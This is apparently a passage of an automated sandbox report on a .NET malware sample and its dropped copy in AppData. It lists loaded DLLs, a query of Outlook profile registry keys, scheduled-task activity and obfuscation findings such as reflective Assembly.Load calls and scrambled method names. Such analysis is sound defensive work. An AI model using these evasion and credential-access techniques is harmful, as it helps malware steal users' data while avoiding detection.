                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Ti5nuRV7y4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ti5nuRV7y4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Source: 0.2.Ti5nuRV7y4.exe.7340000.3.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, IVgKmK05cbPEb74WYZ.cs.Net Code: G0BCnlHg7A System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, IVgKmK05cbPEb74WYZ.cs.Net Code: G0BCnlHg7A System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_076FBD75 push BBE80777h; ret 0_2_076FBD7A
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_076FCA49 push ebx; iretd 0_2_076FCA4A
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0119A5BB push es; ret 14_2_0119A5C0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_01749C30 push esp; retf 02FEh14_2_01749D55
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC9241 push es; ret 14_2_06CC9244
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCC9B1 push ss; retf 14_2_06CCC9B2
                      Source: Ti5nuRV7y4.exeStatic PE information: section name: .text entropy: 7.760400947281738
                      Source: aoTiGLRa.exe.0.drStatic PE information: section name: .text entropy: 7.760400947281738
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, vwb3NariRhtDMCrdte.csHigh entropy of concatenated method names: 'x4X2MSSBxG', 'ekP2uPQwPi', 'uBA2vkgWsS', 'HAM2rtXtNE', 'VRP2FpQvHG', 'JED2QfUZNx', 'QHR2mGxk59', 'VVE2hYTtIE', 'A4t2fUeoXw', 'FDu2E8tbWr'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, GQN1FyUPZaWV4I5L4c.csHigh entropy of concatenated method names: 'mrHntEGT3', 'I4IMsvkS6', 'HSpuXLEwA', 'htEWF1YSJ', 'Ee8rOX6aj', 'crYZY6n5D', 'A67jj6qKnLPSGAWp9i', 'nn8VuTpVkrv1Y9o2hK', 'Gurhv8WmP', 'hAyE9V2hP'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, PAYV6rVjxcGpW3Lffu.csHigh entropy of concatenated method names: 'nI4biSNnAR', 'o6XbIrLd01', 'zpGbLuqO6S', 'LmMbt2I2Pj', 'udPb0kh2i6', 'i97LKq3ctL', 'YlALR60U0g', 'IgELjhF3HJ', 'ofVLS7tliy', 'fHLL5U5i5X'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, vih7cP5nWe4aA5awaD.csHigh entropy of concatenated method names: 'cjkfVjFFbo', 'HxxfkgEj8l', 'ChffgeIXMv', 'HlXf3OtxIE', 'm13fePYSxQ', 'wJkfX0jCMH', 'dD8fo8v3k7', 'cp4fG6Y5aN', 'SKAf1i8baM', 'jeGfw01Hpx'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, PVEWPU1cawceWynxlP.csHigh entropy of concatenated method names: 'wmbtYENoAq', 'AyitpWiNOy', 'vW5tnCSnlk', 'hg5tMwhF6q', 'tm2tBxBQjB', 'e2ZtuAqQt9', 'RGVtWyKI7p', 'zQBtvFIZZA', 'd7ttrOh0de', 'oO9tZWsP1x'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, e9vnVJvXef3cnAd7TZ.csHigh entropy of concatenated method names: 'LI4I4OpiqV', 'jqgI8sQP6V', 'vc0IsvQF48', 'EnUIl5dla0', 'n5lIKfa2s0', 'X50IRRE0Jg', 'GD2IjdNdTW', 'jTmISQr8Xb', 'AqZI5p4Usg', 'o7BIxlKANW'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, PFugLaIhn3gSB907qC.csHigh entropy of concatenated method names: 'Dispose', 'VGUA5j1Ye3', 'tmKUk4M9s5', 'lGa5DqEURF', 'XUGAx19w9j', 'LfiAz2wmuc', 'ProcessDialogKey', 'P4PUHih7cP', 'zWeUA4aA5a', 'NaDUU8kKqP'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, kO7RRbzNqdcLEk4N6o.csHigh entropy of concatenated method names: 'cbhEuJpOqI', 'U7yEva4HTb', 'QWhEr99SK1', 'ajwEV3X2ow', 'aQ2EkO9phU', 'iO1E3MfbhD', 'TslEekMKvU', 'VBREDUJl3j', 'awmEYKTteD', 'XbwEp92LtN'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, IVgKmK05cbPEb74WYZ.csHigh entropy of concatenated method names: 'C3Tqin4YMP', 'qhlq6qcBP1', 'cBEqIFULeR', 'QCgq2rl8FJ', 'ItvqLMTuH9', 'MPqqbjZjtA', 'yFsqtRNEJh', 'dN5q0XN4t8', 'SdQqdDU5bh', 'bd3qaVG9RM'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, uiDI5s48mgQyTGJUfk.csHigh entropy of concatenated method names: 'uFMFwDGdlP', 'QN7F9oRal0', 'L5yF4yLpsq', 'WtSF8yPbdQ', 'MoQFkTENCo', 'cWUFgMacQe', 'XQtF3JWafa', 'rD5FeTIAds', 'nT0FXssXYe', 'SWFFoRrPdK'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, k5acU6oGHp6rLuXhEB.csHigh entropy of concatenated method names: 'AvPt6a51qR', 'CvIt2QCWR0', 'Wo7tbWVYPm', 'fN2bxXv7W5', 'gZdbz0kXjg', 'yFrtHtBND0', 'xhPtAgyuTV', 'G69tU4udA0', 'w4Utq2g7Vy', 'DkZtCf06bX'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, uTCTviACRji3Yu4Tnva.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'o8JOf51p5g', 'LbhOEbNy72', 'nRPO7VsMs5', 'iuEOO6qh7s', 'FxBOPJjGiA', 'mrfONaFmDq', 'ySKODomf20'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, XruPHkJriYsOwyDPyJ.csHigh entropy of concatenated method names: 'UIOcvK9V6Q', 'BxncrOffaj', 'gukcVHU4su', 'dMSckTkgVS', 'sd6c345uvv', 'EYfceYRMrH', 'jGbcoSbxPx', 'PK2cGkXwTx', 'b3Zcw4xoYX', 'wGccT7ZsGo'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, qOVEovRFvsQVUi8gjw.csHigh entropy of concatenated method names: 'eyamSOZw9X', 'Aopmx4Ti2w', 'TsQhHEv4xH', 'uqihAA488i', 'pUdmT7DZ34', 'baem91LkeK', 'ApHmJPXuyK', 'Cx7m4YfawI', 'Jn8m8n740a', 'BJCmsuxCX2'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, DhsR1FCBNIhCMmXvii.csHigh entropy of concatenated method names: 'ELiAt9vnVJ', 'KefA03cnAd', 'liRAahtDMC', 'EdtAyegLtH', 'uqxAFWr9AY', 'G6rAQjxcGp', 'Y8ZIKh6BA8dYV4qaa6', 'TSQxok1BePHu9Gemk6', 'clZAA702ru', 'NcRAqUoXC2'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, EybHOUAAxXwm6QFEecI.csHigh entropy of concatenated method names: 'k57ExMKQvc', 'kA1EzpI7mp', 'jpH7HIOTC8', 'JPf7AUflLx', 'uo97UdkVO9', 'MWw7qoMW0c', 'iU57Caf4wk', 'sJt7i8njpv', 'jV676bNujA', 'FSQ7IQZIVj'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, PjklEX2XWCOrPMYWlI.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MIIU5H8qyx', 'Pa6Ux7hhpG', 'P9oUzjvljf', 'pdZqHsIbAw', 'hYYqAINDFD', 'pxPqUhsfWX', 'GbKqqdLL9L', 'Gi2m99Iawy5DujcvbrW'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, RkKqPYxylAywnkp0Um.csHigh entropy of concatenated method names: 'KxyE2D4RWy', 'tFXEL8Xfaa', 'brREbyGOvm', 'j9TEtubWZQ', 'IJIEf6rHZi', 'XLaE0yrQrR', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, zasVD2AH3v4MkR5a6tM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LLLET02dtB', 'uSgE9DVCwZ', 'R1wEJPEOwt', 'P3mE4vC0IU', 'X4uE8GHPL2', 'yLvEsNf5bA', 'uT7ElwuBDw'
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, pBZQ1xjfYRGUj1Ye35.csHigh entropy of concatenated method names: 'o76fFSnR0S', 'f6kfmbl8Lu', 'J5OffxD1V8', 'Nocf7MD2KH', 'UNTfPP3vjp', 'dA6fDTjJ2O', 'Dispose', 'Jxbh6GOTxg', 'wTihIrOM8I', 'lNYh296XJg'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, vwb3NariRhtDMCrdte.csHigh entropy of concatenated method names: 'x4X2MSSBxG', 'ekP2uPQwPi', 'uBA2vkgWsS', 'HAM2rtXtNE', 'VRP2FpQvHG', 'JED2QfUZNx', 'QHR2mGxk59', 'VVE2hYTtIE', 'A4t2fUeoXw', 'FDu2E8tbWr'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, GQN1FyUPZaWV4I5L4c.csHigh entropy of concatenated method names: 'mrHntEGT3', 'I4IMsvkS6', 'HSpuXLEwA', 'htEWF1YSJ', 'Ee8rOX6aj', 'crYZY6n5D', 'A67jj6qKnLPSGAWp9i', 'nn8VuTpVkrv1Y9o2hK', 'Gurhv8WmP', 'hAyE9V2hP'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, PAYV6rVjxcGpW3Lffu.csHigh entropy of concatenated method names: 'nI4biSNnAR', 'o6XbIrLd01', 'zpGbLuqO6S', 'LmMbt2I2Pj', 'udPb0kh2i6', 'i97LKq3ctL', 'YlALR60U0g', 'IgELjhF3HJ', 'ofVLS7tliy', 'fHLL5U5i5X'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, vih7cP5nWe4aA5awaD.csHigh entropy of concatenated method names: 'cjkfVjFFbo', 'HxxfkgEj8l', 'ChffgeIXMv', 'HlXf3OtxIE', 'm13fePYSxQ', 'wJkfX0jCMH', 'dD8fo8v3k7', 'cp4fG6Y5aN', 'SKAf1i8baM', 'jeGfw01Hpx'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, PVEWPU1cawceWynxlP.csHigh entropy of concatenated method names: 'wmbtYENoAq', 'AyitpWiNOy', 'vW5tnCSnlk', 'hg5tMwhF6q', 'tm2tBxBQjB', 'e2ZtuAqQt9', 'RGVtWyKI7p', 'zQBtvFIZZA', 'd7ttrOh0de', 'oO9tZWsP1x'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, e9vnVJvXef3cnAd7TZ.csHigh entropy of concatenated method names: 'LI4I4OpiqV', 'jqgI8sQP6V', 'vc0IsvQF48', 'EnUIl5dla0', 'n5lIKfa2s0', 'X50IRRE0Jg', 'GD2IjdNdTW', 'jTmISQr8Xb', 'AqZI5p4Usg', 'o7BIxlKANW'
                      Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, PFugLaIhn3gSB907qC.csHigh entropy of concatenated method names: 'Dispose', 'VGUA5j1Ye3', 'tmKUk4M9s5', 'lGa5DqEURF', 'XUGAx19w9j', 'LfiAz2wmuc', 'ProcessDialogKey', 'P4PUHih7cP', 'zWeUA4aA5a', 'NaDUU8kKqP'
